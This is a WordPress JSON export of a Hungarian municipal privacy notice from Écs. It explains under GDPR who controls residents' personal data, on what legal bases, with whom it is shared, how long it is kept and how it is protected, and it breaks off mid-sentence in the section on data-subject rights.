{"id":3492,"date":"2025-09-28T12:58:47","date_gmt":"2025-09-28T10:58:47","guid":{"rendered":"https:\/\/ecsfalu.hu\/web\/?p=3492"},"modified":"2025-10-14T09:18:49","modified_gmt":"2025-10-14T07:18:49","slug":"adatvedelmi-tajekoztato-2","status":"publish","type":"post","link":"https:\/\/ecsfalu.hu\/web\/adatvedelmi-tajekoztato-2\/","title":{"rendered":"Adatv\u00e9delmi t\u00e1j\u00e9koztat\u00f3"},"content":{"rendered":"<p><span style=\"font-family: arial, helvetica, sans-serif;\">Szervezet\u00fcnk kiemelt figyelmet ford\u00edt az \u00d6n szem\u00e9lyes adatainak v\u00e9delm\u00e9re.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">A szem\u00e9lyes adatok kezel\u00e9s\u00e9vel \u00f6sszef\u00fcgg\u0151 tev\u00e9kenys\u00e9geinket az Eur\u00f3pai Uni\u00f3s \u00e1ltal\u00e1nos adatv\u00e9delmi rendeletben (GDPR: General Data Protection Regulation) k\u00f6telez\u0151en el\u0151\u00edrt \u00e9s alkalmazand\u00f3 szab\u00e1lyok tekintet\u00e9ben fel\u00fclvizsg\u00e1ltuk \u00e9s elk\u00f6telezettek vagyunk azir\u00e1nt, hogy az abban, valamint a hazai hat\u00e1lyos jogszab\u00e1lyokban meghat\u00e1rozott k\u00f6vetelm\u00e9nyeknek megfelel\u0151en v\u00e9gezz\u00fck.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Az adatkezel\u00e9sr\u0151l \u00e1ltal\u00e1noss\u00e1gban<br \/>\n<\/strong><\/span><span style=\"font-family: arial, helvetica, sans-serif;\">Adatkezel\u00e9ssel kapcsolatos f\u0151bb inform\u00e1ci\u00f3k<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Mi az adatkezel\u00e9si t\u00e1j\u00e9koztat\u00f3 c\u00e9lja?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">A t\u00e1j\u00e9koztat\u00e1s c\u00e9lja az, hogy \u00e1tfog\u00f3 felvil\u00e1gos\u00edt\u00e1st adjunk \u00d6nnek arr\u00f3l, hogy mik\u00e9nt gy\u0171jtj\u00fck, haszn\u00e1ljuk fel, osztjuk meg \u00e9s v\u00e9dj\u00fck azon szem\u00e9lyes adatait, melyeket a tev\u00e9kenys\u00e9g\u00fcnk sor\u00e1n, vagy a weboldalunk haszn\u00e1lata k\u00f6zben kezel\u00fcnk \u00d6nnel kapcsolatban, tov\u00e1bb\u00e1 itt lehet t\u00e1j\u00e9koz\u00f3dni arr\u00f3l is, hogy mik\u00e9nt lehet kapcsolatba l\u00e9pni vel\u00fcnk, ha k\u00e9rd\u00e9se lenne az adatkezel\u00e9s\u00fcnkkel kapcsolatban.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Ki az adatkezel\u0151?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">Szem\u00e9lyes adatainak kezel\u0151je az al\u00e1bbi szervezetek lehetnek:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">\u00c9cs K\u00f6zs\u00e9gi \u00d6nkorm\u00e1nyzat<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">\u00c9csi Polg\u00e1rmesteri Hivatal<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">\u00c9csi Napraforg\u00f3 \u00d3voda \u00e9s B\u00f6lcs\u0151de<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>\u00a0<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hogyan lehet vel\u00fcnk kapcsolatba l\u00e9pni?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">A v\u00e9lem\u00e9nye sz\u00e1m\u00edt nek\u00fcnk! Amennyiben b\u00e1rmilyen k\u00e9rd\u00e9se vagy \u00e9szrev\u00e9tele lenne a szem\u00e9lyes adatai kezel\u00e9s\u00e9vel kapcsolatban, akkor az adatv\u00e9delmi tisztvisel\u0151nkh\u00f6z vagy\u00a0\u00fcgyf\u00e9lszolg\u00e1latunkhoz\u00a0fordulhat a k\u00f6vetkez\u0151 el\u00e9rhet\u0151s\u00e9gek egyik\u00e9n:<\/span><\/p>\n<ul>\n<li style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">E-mailben: a\u00a0ecs&lt;kukac&gt;peterszalay&lt;pont&gt;hu\u00a0elektronikus c\u00edmen k\u00f6zvetlen\u00fcl az adatv\u00e9delmi tisztvisel\u0151nkh\u00f6z fordulhat.<\/span><\/li>\n<li style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Telefonon az itt tal\u00e1lhat\u00f3 <a href=\"https:\/\/ecsfalu.hu\/web\/onkormanyzat\/\">telefonsz\u00e1mon<\/a>.<\/span><\/li>\n<li style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Lev\u00e9lben az\u00a0itt tal\u00e1lhat\u00f3\u00a0postac\u00edmen, <a href=\"https:\/\/ecsfalu.hu\/web\/onkormanyzat\/\">email c\u00edmen.<\/a>\u00a0<\/span><\/li>\n<li style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Szem\u00e9lyesen a szervezet sz\u00e9khely\u00e9n, vagy telephely\u00e9n.<\/span><\/li>\n<li style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/epapir.gov.hu\/\">E-pap\u00edron<\/a>\u00a0kereszt\u00fcl a megfelel\u0151 t\u00e9mak\u00f6r kiv\u00e1laszt\u00e1s\u00e1val elektronikus \u00faton.<\/span><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Alapelveink<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Szervezet\u00fcnk elk\u00f6telezett szem\u00e9lyes adatai v\u00e9delme mellett. Fontosnak tartjuk, hogy a k\u00f6zfeladatell\u00e1t\u00e1sunk sor\u00e1n a kezel\u00e9s\u00fcnkbe ker\u00fcl\u0151 szem\u00e9lyes adatokra kiemelt figyelmet ford\u00edtsunk, a birtokunkban l\u00e9v\u0151 adatait megv\u00e9dj\u00fck \u00e9s a hat\u00e1lyos adatkezel\u00e9sre vonatkoz\u00f3 jogszab\u00e1lyok szerint kezelj\u00fck.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Milyen adatait kezelj\u00fck?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Az, hogy milyen inform\u00e1ci\u00f3kat kezel\u00fcnk \u00d6nr\u0151l, illetve, hogy ezeket az inform\u00e1ci\u00f3kat milyen m\u00f3don szerezt\u00fck meg, nagyban f\u00fcgg att\u00f3l, hogy milyen \u00fcgyben \u00e1llunk kapcsolatban egym\u00e1ssal. Nem mindegy, hogy hat\u00f3s\u00e1gi elj\u00e1r\u00e1sban \u00fcgyf\u00e9l-hat\u00f3s\u00e1g kapcsolatban \u00e1llunk egym\u00e1ssal, vagy pedig csak \u00e9rdekl\u0151d\u0151k\u00e9nt l\u00e9pett kapcsolatba vel\u00fcnk. Az sem mindegy, hogy a szem\u00e9lyes adatokat \u00d6nt\u0151l k\u00e9rt\u00fck be, vagy m\u00e1s forr\u00e1sb\u00f3l szerezt\u00fck be.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Lehetnek ezek a szem\u00e9lyes adatok a klasszikus n\u00e9v, lakc\u00edm, \u00e9desanyja neve \u00e9s t\u00e1rsai, vagy kapcsolattart\u00e1si adatok (pl. email c\u00edm), de ak\u00e1r szoci\u00e1lis helyzetre vonatkoz\u00f3 k\u00fcl\u00f6nleges adatok, vagy j\u00f6vedelemre \u00e9s vagyonra vonatkoz\u00f3 adatok is.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">A k\u00fcl\u00f6nf\u00e9le adatkezel\u00e9ssel kapcsolatban erre vonatkoz\u00f3 konkr\u00e9t inform\u00e1ci\u00f3kat a specifikus adatkezel\u00e9si t\u00e1j\u00e9koztat\u00f3kban lehet olvasni.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Milyen jogalapon kezelj\u00fck az adatait?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Jogi k\u00f6telezetts\u00e9g teljes\u00edt\u00e9se folyt\u00e1n:<\/strong>\u00a0ide tartoznak p\u00e9ld\u00e1ul azok az adatok, amelyeket az\u00e9rt kell kezeln\u00fcnk, hogy az ad\u00f3z\u00e1ssal \u00e9s k\u00f6nyvel\u00e9ssel kapcsolatos k\u00f6telezetts\u00e9geinket teljes\u00edteni tudjuk. Adatai kezel\u00e9s\u00e9re szigor\u00fa bels\u0151 szab\u00e1lyzatok vonatkoznak, amelyek biztos\u00edtj\u00e1k, hogy azokat a jogszab\u00e1lyokat betartva, a jogszab\u00e1ly \u00e1ltal el\u0151\u00edrt ideig kezelj\u00fck.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>K\u00f6z\u00e9rdek\u0171 feladat v\u00e9grehajt\u00e1sa, vagy k\u00f6zhatalmi jogos\u00edtv\u00e1ny gyakorl\u00e1sa folyt\u00e1n:<\/strong>\u00a0ide kell \u00e9rteni minden olyan esetet, amikor a szervezet\u00fcnk jogszab\u00e1lyi rendelkez\u00e9s alapj\u00e1n k\u00f6zfeladatot l\u00e1t el, vagy k\u00f6zhatalmi szervk\u00e9nt l\u00e9p fel. Tipikusan ilyenek a hat\u00f3s\u00e1gi elj\u00e1r\u00e1sok, enged\u00e9lyez\u00e9sek, tilt\u00e1sok, szankcion\u00e1l\u00e1sok. A kev\u00e9sb\u00e9 hat\u00f3s\u00e1gi jelleg\u0171 esetek k\u00f6z\u00fcl pedig p\u00e9ldak\u00e9nt eml\u00edthetj\u00fck az \u00f3vodai nevel\u00e9s ell\u00e1t\u00e1s\u00e1t, vagy a k\u00f6ztemet\u0151 \u00fczemeltet\u00e9s\u00e9t.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>K\u00f6z\u00e9rdek\u0171 c\u00e9lb\u00f3l:<\/strong>\u00a0Az adatkezel\u00e9s alapj\u00e1t k\u00e9pez\u0151 k\u00f6z\u00e9rdek\u0171 c\u00e9lt kiz\u00e1r\u00f3lag t\u00f6rv\u00e9ny vagy \u2013 t\u00f6rv\u00e9ny felhatalmaz\u00e1sa alapj\u00e1n, az abban meghat\u00e1rozott k\u00f6rben, k\u00fcl\u00f6nleges adatnak vagy b\u0171n\u00fcgyi szem\u00e9lyes adatnak nem min\u0151s\u00fcl\u0151 adat eset\u00e9n \u2013 helyi \u00f6nkorm\u00e1nyzat rendelet \u00e1llap\u00edthat meg. Tipikusan ilyen eset a k\u00f6zter\u00fcleten alkalmazott elektronikus megfigyel\u0151 rendszer \u00fczemeltet\u00e9se.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hozz\u00e1j\u00e1rul\u00e1s alapj\u00e1n:<\/strong>\u00a0ide \u00e9rt\u00fcnk minden olyan esetet, mikor \u2013 el\u0151zetes t\u00e1j\u00e9koztat\u00e1st k\u00f6vet\u0151en \u2013 \u00fagy nyilatkozott, hogy bizonyos szem\u00e9lyes adatait kezelhetj\u00fck. Az adatok kezel\u00e9s\u00e9re vonatkoz\u00f3 hozz\u00e1j\u00e1rul\u00e1st b\u00e1rmikor visszavonhatja.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>A szervezet jogos \u00e9rdek\u00e9ben:<\/strong>\u00a0ide \u00e9rt\u00fcnk minden olyan esetet, ahol az adatkezel\u00e9s a szervezet vagy a vele kapcsolatban \u00e1ll\u00f3 mag\u00e1nszem\u00e9lyek jogos \u00e9rdekeinek \u00e9rv\u00e9nyes\u00edt\u00e9s\u00e9hez sz\u00fcks\u00e9ges. Amennyiben szem\u00e9lyes adatait ilyen jogalappal kezelj\u00fck, mindig felm\u00e9rj\u00fck jogos \u00e9rdekeinket, hogy meggy\u0151z\u0151dj\u00fcnk arr\u00f3l, hogy azokkal szemben nem \u00e9lveznek el\u0151nyt az \u00d6n jogai. Ha a szem\u00e9lyes adatait ezen a jogalapon kezelj\u00fck, akkor jog\u00e1ban \u00e1ll tiltakozni az ilyen adatkezel\u00e9s ellen.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Kikkel osztjuk meg a szem\u00e9lyes adatait?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>F\u0151szab\u00e1ly szerint az adatokat harmadik f\u00e9l r\u00e9sz\u00e9re jogszab\u00e1lyi felhatalmaz\u00e1s n\u00e9lk\u00fcl, vagy ha azt a k\u00f6z\u00e9rdek\u0171 feladatell\u00e1t\u00e1s m\u00f3dja nem k\u00f6veteli meg, nem tov\u00e1bb\u00edtjuk<\/strong>, \u00e1m felh\u00edvjuk az \u00c9rintettek figyelm\u00e9t, hogy szem\u00e9lyes adatok b\u00edr\u00f3s\u00e1g \u00e9s hat\u00f3s\u00e1g r\u00e9sz\u00e9re t\u00f6rt\u00e9n\u0151 kiad\u00e1s\u00e1t el\u0151\u00edrhatja jogszab\u00e1ly. Az adattov\u00e1bb\u00edt\u00e1sra ir\u00e1nyul\u00f3 megkeres\u00e9st k\u00f6vet\u0151en a rendelkez\u00e9sre \u00e1ll\u00f3 adatok alapj\u00e1n megvizsg\u00e1ljuk az adattov\u00e1bb\u00edt\u00e1s felt\u00e9teleinek fenn\u00e1ll\u00e1s\u00e1t, a k\u00e9r\u00e9s teljes\u00edthet\u0151s\u00e9g\u00e9t. Az adattov\u00e1bb\u00edt\u00e1si k\u00e9relem abban az esetben teljes\u00edthet\u0151, ha az tartalmazza: az adattov\u00e1bb\u00edt\u00e1s c\u00e9lj\u00e1t, jogalapj\u00e1t (t\u00f6rv\u00e9nyi rendelkez\u00e9s pontos megjel\u00f6l\u00e9s\u00e9t), a k\u00e9rt adatok k\u00f6r\u00e9nek pontos meghat\u00e1roz\u00e1s\u00e1t, az \u00e9rintett szem\u00e9ly (szem\u00e9lyek) azonos\u00edt\u00e1s\u00e1hoz sz\u00fcks\u00e9ges adatokat. Amennyiben az adattov\u00e1bb\u00edt\u00e1s felt\u00e9telei fenn\u00e1llnak, az adatokat a megkeres\u00e9st beny\u00fajt\u00f3 szerv rendelkez\u00e9s\u00e9re kell bocs\u00e1tani.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">A fenti eseten k\u00edv\u00fcl a szerz\u0151d\u00f6tt adatfeldolgoz\u00f3knak, a szervezeten bel\u00fcli munkav\u00e1llal\u00f3knak, illetve az \u00f6nkorm\u00e1nyzatnak a k\u00f6lts\u00e9gvet\u00e9si szervei r\u00e9sz\u00e9re megk\u00fcld\u00e9sre ker\u00fclhetnek az \u00d6n szem\u00e9lyes adatai. Ilyen adatfeldolgoz\u00f3 tipikusan az adminisztrat\u00edv feladatokat ell\u00e1t\u00f3 Hivatal, a Magyar Posta, az elektronikus levelez\u00e9s\u00fcnket biztos\u00edt\u00f3 t\u00e1rhelyszolg\u00e1ltat\u00f3, stb.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Minden esetben figyel\u00fcnk arra, hogy akiknek tov\u00e1bb\u00edtjuk az adatokat, azok megfelel\u0151 garanci\u00e1kat ny\u00fajtsanak az adatv\u00e9delemi jogszab\u00e1lyoknak megfelel\u0151 adatkezel\u00e9sre, \u00e9s az \u00e9rintettek jogainak v\u00e9delm\u00e9t biztos\u00edt\u00f3, megfelel\u0151 technikai \u00e9s szervez\u00e9si int\u00e9zked\u00e9sek v\u00e9grehajt\u00e1s\u00e1ra.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Nemzetk\u00f6zi adattov\u00e1bb\u00edt\u00e1s t\u00f6rt\u00e9nik-e?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">El\u0151fordulhat, hogy adatait az Eur\u00f3pai Gazdas\u00e1gi T\u00e9rs\u00e9gen k\u00edv\u00fcli orsz\u00e1gokban tal\u00e1lhat\u00f3 szolg\u00e1ltat\u00f3khoz tov\u00e1bb\u00edtjuk (harmadik orsz\u00e1gba t\u00f6rt\u00e9n\u0151 adattov\u00e1bb\u00edt\u00e1s). Harmadik orsz\u00e1gnak min\u0151s\u00fclnek az Eur\u00f3pai Gazdas\u00e1gi T\u00e9rs\u00e9gen (EGT, azaz az Eur\u00f3pai Uni\u00f3 tag\u00e1llamai, tov\u00e1bb\u00e1 Izland, Liechtenstein, Norv\u00e9gia \u00e9s Sv\u00e1jc) k\u00edv\u00fcli orsz\u00e1gok. Ilyen jelleg\u0171 adattov\u00e1bb\u00edt\u00e1s akkor fordulhat el\u0151 tipikusan, ha a b\u00e9relt szervereink, (azaz ahol az adatokat t\u00e1roljuk) az EGT-n k\u00edv\u00fcl tal\u00e1lhat\u00f3k.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Ritka esetekben el\u0151fordulhat olyan hat\u00e1ron \u00e1tny\u00fal\u00f3 k\u00f6zigazgat\u00e1si elj\u00e1r\u00e1s, ahol harmadik orsz\u00e1g \u00e1llam\u00e1nak hat\u00f3s\u00e1g\u00e1val kell egy\u00fctt dolgoznunk. Tipikusan el\u0151fordulhatnak ilyen esetek a hagyat\u00e9ki \u00fcgyekben, vagy k\u00fclf\u00f6ld\u00f6n ig\u00e9nybevett ad\u00f3kedvezm\u00e9nyekhez kapcsol\u00f3d\u00f3 igazol\u00e1sok ki\u00e1ll\u00edt\u00e1s\u00e1n\u00e1l.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Ha a c\u00e9lorsz\u00e1gban \u00e1ltal\u00e1noss\u00e1gban nem \u00e9rv\u00e9nyes\u00fclnek az EU-ban hat\u00e1lyos adatv\u00e9delmi szab\u00e1lyok, akkor a harmadik orsz\u00e1gban tal\u00e1lhat\u00f3 f\u00e9llel k\u00f6t\u00f6tt meg\u00e1llapod\u00e1sban szerepelnek a harmadik orsz\u00e1gba t\u00f6rt\u00e9n\u0151 adattov\u00e1bb\u00edt\u00e1sra vonatkoz\u00f3, az\u00a0<a href=\"https:\/\/eur-lex.europa.eu\/eli\/dec_impl\/2021\/914\/oj?uri=CELEX%3A32021D0914&amp;locale=en\">Eur\u00f3pai Bizotts\u00e1g d\u00f6nt\u00e9s\u00e9n alapul\u00f3 \u00e1ltal\u00e1nos szerz\u0151d\u00e9ses felt\u00e9telek<\/a>.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Meddig t\u00e1roljuk a szem\u00e9lyes adatait?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Adatait \u2013 az adatkezel\u00e9s jogalapj\u00e1t\u00f3l f\u00fcgg\u0151en \u2013 addig t\u00e1roljuk,<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">ameddig arra jogszab\u00e1lyi el\u0151\u00edr\u00e1s k\u00f6telez benn\u00fcnket, \u2013 ennek hi\u00e1ny\u00e1ban,<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">ameddig a szervezet\u00fcnkkel k\u00f6t\u00f6tt szerz\u0151d\u00e9se teljes\u00edt\u00e9se \u00e9s a szerz\u0151d\u00e9sb\u0151l ered\u0151 ig\u00e9nyek \u00e9rv\u00e9nyes\u00edt\u00e9se \u00e9rdek\u00e9ben indokolt (ez\u00e9rt a szerz\u0151d\u00e9s megsz\u0171n\u00e9s\u00e9t k\u00f6vet\u0151en bizonyos ideig m\u00e9g \u0151rizz\u00fck az adatait), vagy<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">ameddig az adatkezel\u00e9sre vonatkoz\u00f3 hozz\u00e1j\u00e1rul\u00e1s\u00e1t nem vonja vissza, vagy<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\">ameddig a szervezet\u00fcnk jogos \u00e9rdek\u00e9re tekintettel indokolt a szem\u00e9lyes adat kezel\u00e9se.<\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Az adatkezel\u00e9s jogalapj\u00e1t\u00f3l f\u00fcggetlen\u00fcl, minden esetben csak addig kezelj\u00fck az adatait, ameddig az az adatkezel\u00e9si c\u00e9l teljes\u00edt\u00e9s\u00e9hez felt\u00e9tlen\u00fcl sz\u00fcks\u00e9ges.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>\u00a0<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hogyan v\u00e9dj\u00fck a szem\u00e9lyes adatokat?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Megtesz\u00fcnk minden sz\u00fcks\u00e9ges technikai vagy szervez\u00e9si int\u00e9zked\u00e9st annak \u00e9rdek\u00e9ben, hogy biztos\u00edtsuk az adatok biztons\u00e1gos, s\u00e9r\u00fcl\u00e9smentes kezel\u00e9s\u00e9t, az adatok jogosulatlan vagy jogellenes kezel\u00e9s\u00e9vel, v\u00e9letlen elveszt\u00e9s\u00e9vel, megsemmis\u00edt\u00e9s\u00e9vel vagy k\u00e1rosod\u00e1s\u00e1val szembeni v\u00e9delmet is ide\u00e9rtve. Gondoskodunk teh\u00e1t arr\u00f3l, hogy a kezelt adatokhoz illet\u00e9ktelen szem\u00e9ly ne f\u00e9rhessen hozz\u00e1, ne hozhassa nyilv\u00e1noss\u00e1gra, ne tov\u00e1bb\u00edthassa, valamint azokat ne m\u00f3dos\u00edthassa, t\u00f6r\u00f6lhesse. Megtesz\u00fcnk minden t\u0151l\u00fcnk telhet\u0151t annak \u00e9rdek\u00e9ben, hogy az adatok v\u00e9letlen\u00fcl se s\u00e9r\u00fcljenek, illetve semmis\u00fcljenek meg. A fenti k\u00f6telezetts\u00e9gv\u00e1llal\u00e1st az adatkezel\u00e9si tev\u00e9kenys\u00e9gben r\u00e9szt vev\u0151 munkav\u00e1llal\u00f3ink, illetve az esetlegesen ig\u00e9nybe vett adatfeldolgoz\u00f3ink r\u00e9sz\u00e9re is el\u0151\u00edrjuk.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Adatv\u00e9delemmel \u00e9s adatbiztons\u00e1ggal foglalkoz\u00f3 munkat\u00e1rsaink folyamatosan fel\u00fclvizsg\u00e1lj\u00e1k az inform\u00e1ci\u00f3biztons\u00e1gra vonatkoz\u00f3 elj\u00e1r\u00e1sainkat, \u00e9s sz\u00fcks\u00e9g eset\u00e9n \u00faj technikai \u00e9s szervez\u00e9si int\u00e9zked\u00e9seket hoznak az\u00e9rt, hogy szem\u00e9lyes adatait meg tudjuk v\u00e9deni.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Az interneten kereszt\u00fcl t\u00f6rt\u00e9n\u0151 kommunik\u00e1ci\u00f3 \u2013 p\u00e9ld\u00e1ul az e-mail \u2013 csak abban az esetben biztons\u00e1gos, ha az titkos\u00edtva van. Az internet term\u00e9szet\u00e9b\u0151l ad\u00f3d\u00f3an az online kommunik\u00e1ci\u00f3 c\u00e9lba \u00e9r\u00e9s el\u0151tt ak\u00e1r t\u00f6bb orsz\u00e1gon is kereszt\u00fclhaladhat. Az ellen\u0151rz\u00e9si k\u00f6r\u00fcnk\u00f6n k\u00edv\u00fcl es\u0151 jogosulatlan hozz\u00e1f\u00e9r\u00e9s\u00e9rt vagy adatveszt\u00e9s\u00e9rt nem tudunk felel\u0151ss\u00e9get v\u00e1llalni. Pontosan ez\u00e9rt az elektronikus kommunik\u00e1ci\u00f3 els\u0151dleges form\u00e1ja a hiteles\u00edtett elektronikus \u00fcgyint\u00e9z\u00e9sre dedik\u00e1lt platformok (e-pap\u00edr, \u00fcgyf\u00e9lkapu, stb.). Telefonon kereszt\u00fcl szem\u00e9lyes adatokat nem k\u00e9r\u00fcnk el, mert egyik\u00fcnk sem tud meggy\u0151z\u0151dni arr\u00f3l, hogy ki besz\u00e9l a vonal m\u00e1sik v\u00e9g\u00e9n.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">El\u0151fordulhat, hogy a weboldalunkon harmadik felek weboldalaira mutat\u00f3 linkek tal\u00e1lhat\u00f3k. Nem v\u00e1llaljuk a felel\u0151ss\u00e9get ezen harmadik felek weboldalainak biztons\u00e1g\u00e1\u00e9rt \u00e9s tartalm\u00e1\u00e9rt. \u00cdgy teh\u00e1t mindenk\u00e9ppen olvassa el ezen v\u00e1llalatok adatkezel\u00e9s\u00e9re \u00e9s az \u00e1ltaluk haszn\u00e1lt s\u00fctikre vonatkoz\u00f3 t\u00e1j\u00e9koztat\u00f3j\u00e1t, miel\u0151tt haszn\u00e1lja a weboldalukat vagy megadja a szem\u00e9lyes adatait.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Szem\u00e9lyes adatait be\u00e9p\u00edtett modulokon kereszt\u00fcl a k\u00f6z\u00f6ss\u00e9gi m\u00e9dia fel\u00fcleteken megoszthatja m\u00e1sokkal (ilyenek p\u00e9ld\u00e1ul a Google, a Facebook, a Twitter, stb.), vagy olyan harmadik felek \u00e1ltal ny\u00fajtott szolg\u00e1ltat\u00e1sokat is ig\u00e9nybe vehet, amelyek lehet\u0151v\u00e9 teszik, hogy v\u00e9lem\u00e9ny\u00e9t megossza m\u00e1sokkal, vagy m\u00e1s szem\u00e9lyes inform\u00e1ci\u00f3kat tegyen k\u00f6zz\u00e9, amelyeket harmadik felek haszn\u00e1lhatnak. A k\u00f6z\u00f6ss\u00e9gi m\u00e9diumokat, port\u00e1lokat, alkalmaz\u00e1sokat \u00e9s be\u00e9p\u00edtett modulokat a k\u00f6z\u00f6ss\u00e9gi h\u00e1l\u00f3k \u00fczemeltetik. M\u0171k\u00f6d\u00e9s\u00fcket saj\u00e1t felhaszn\u00e1l\u00e1si felt\u00e9teleik, valamint adatkezel\u00e9sre \u00e9s s\u00fctikre vonatkoz\u00f3 ir\u00e1nyelveik szab\u00e1lyozz\u00e1k. K\u00e9rj\u00fck, minden esetben ismerje meg ezek tartalm\u00e1t!<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Milyen jogai vannak a kezelt adatokkal kapcsolatban?<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>El\u0151zetes t\u00e1j\u00e9koz\u00f3d\u00e1shoz val\u00f3 jog:<\/strong>\u00a0Jogosult az adatainak kezel\u00e9s\u00e9vel kapcsolatban az \u00e1tl\u00e1that\u00f3 t\u00e1j\u00e9koztat\u00e1sra, inform\u00e1ci\u00f3ra adatainak kezel\u00e9s\u00e9t illet\u0151en, tov\u00e1bb\u00e1 az \u00e9rintetti jogainak gyakorl\u00e1s\u00e1ra vonatkoz\u00f3 lehet\u0151s\u00e9gekr\u0151l. Igyeksz\u00fcnk az \u00d6n adatkezel\u00e9s\u00e9re vonatkoz\u00f3 inform\u00e1ci\u00f3kat t\u00f6bb m\u00f3don is el\u00e9rhet\u0151v\u00e9 tenni. Jogosult, hogy hozz\u00e1f\u00e9rjen az \u00d6nre vonatkoz\u00f3an gy\u0171jt\u00f6tt adatokhoz, valamint arra, hogy egyszer\u0171en \u00e9s \u00e9szszer\u0171 id\u0151k\u00f6z\u00f6nk\u00e9nt, az adatkezel\u00e9s jogszer\u0171s\u00e9g\u00e9nek meg\u00e1llap\u00edt\u00e1sa \u00e9s ellen\u0151rz\u00e9se \u00e9rdek\u00e9ben gyakorolja e jog\u00e1t.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hozz\u00e1f\u00e9r\u00e9shez val\u00f3 jog:<\/strong>\u00a0Az adatkezel\u00e9s t\u00e1rgy\u00e1t k\u00e9pez\u0151 szem\u00e9lyes adatok m\u00e1solat\u00e1t k\u00f6telesek vagyunk a rendelkez\u00e9s\u00e9re bocs\u00e1tani. Ha elektronikus \u00faton ny\u00fajtja be a k\u00e9relm\u00e9t, az 